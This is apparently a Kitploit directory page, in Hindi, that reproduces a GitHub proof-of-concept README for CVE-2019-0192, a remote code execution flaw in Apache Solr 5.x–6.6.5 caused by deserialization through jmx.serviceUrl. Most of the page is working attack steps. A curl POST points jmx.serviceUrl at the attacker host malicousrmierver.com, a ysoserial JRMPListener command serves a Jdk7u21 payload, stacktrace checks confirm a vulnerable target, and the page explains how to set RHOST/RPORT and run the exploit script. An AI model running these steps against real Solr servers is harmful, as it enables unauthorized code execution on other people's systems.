Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0192 — jmx.serviceUrl के माध्यम से अविश्वसनीय डेटा के deserialization का उपयोग करके Apache Solr पर RCE | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2019-0192
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubmpgn/cve-2019-0192

CVE-2019-0192

jmx.serviceUrl के माध्यम से अविश्वसनीय डेटा के deserialization का उपयोग करके Apache Solr पर RCE

रिपॉजिटरी देखें
208557 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-0192 - Apache Solr RCE 5.0.0 से 5.5.5 और 6.0.0 से 6.6.5

यह Apache Solr RCE का एक प्रारंभिक PoC है

स्रोत: https://issues.apache.org/jira/browse/SOLR-13301:

ConfigAPI, HTTP POST अनुरोध के माध्यम से Solr के JMX सर्वर को कॉन्फ़िगर करने की अनुमति देता है। इसे एक दुर्भावनापूर्ण RMI सर्वर की ओर इंगित करके, एक हमलावर Solr की असुरक्षित deserialization का लाभ उठाकर Solr पक्ष पर रिमोट कोड निष्पादन (remote code execution) ट्रिगर कर सकता है।

प्रूफ ऑफ कॉन्सेप्ट

image


सुरक्षा सलाह (security advisory) के विवरण को देखकर और ConfigAPI Apache Solr के संसाधनों की जाँच करके, हम एक JMX सर्वर का संदर्भ पा सकते हैं:

image

serviceUrl - (वैकल्पिक str) JMX सर्वर के लिए सेवा URL। यदि निर्दिष्ट नहीं है तो डिफ़ॉल्ट प्लेटफ़ॉर्म MBean सर्वर का उपयोग किया जाएगा।

ConfigAPI कैसे काम करता है यह जाँच कर हम रिमोट JMX सर्वर सेट करने का तरीका दोहरा सकते हैं:

root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

PoC के लिए मैं yoserial का उपयोग करके Jdk7u21 पेलोड के साथ एक दुर्भावनापूर्ण RMI सर्वर बनाऊँगा।

  1. दुर्भावनापूर्ण RMI सर्वर प्रारंभ करें:
root@kitploit:~
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. POST अनुरोध चलाएँ:
root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

नोट: आपको एक अच्छे stacktrace के साथ 500 त्रुटि मिलनी चाहिए

  1. stacktrace की जाँच करें:
  • यदि आपको यह त्रुटि दिखे: "Non-annotation type in annotation serial stream" तो इसका मतलब है कि Apache Solr JRE 7u25 से अधिक java संस्करण के साथ चल रहा है और यह PoC काम नहीं करेगा।

  • अन्यथा आपको यह त्रुटि दिखनी चाहिए: "undeclared checked exception; nested exception is" और PoC काम करना चाहिए।

एक्सप्लॉइट

  1. yoserial डाउनलोड करें: https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. स्क्रिप्ट में मान बदलें:
root@kitploit:~
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. फिर स्क्रिप्ट निष्पादित करें:
root@kitploit:~
python3 CVE-2019-0192.py

सुरक्षा सलाह:

  • http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

संसाधन:

  • https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
  • https://issues.apache.org/jira/browse/SOLR-13301
टूल डाउनलोड करें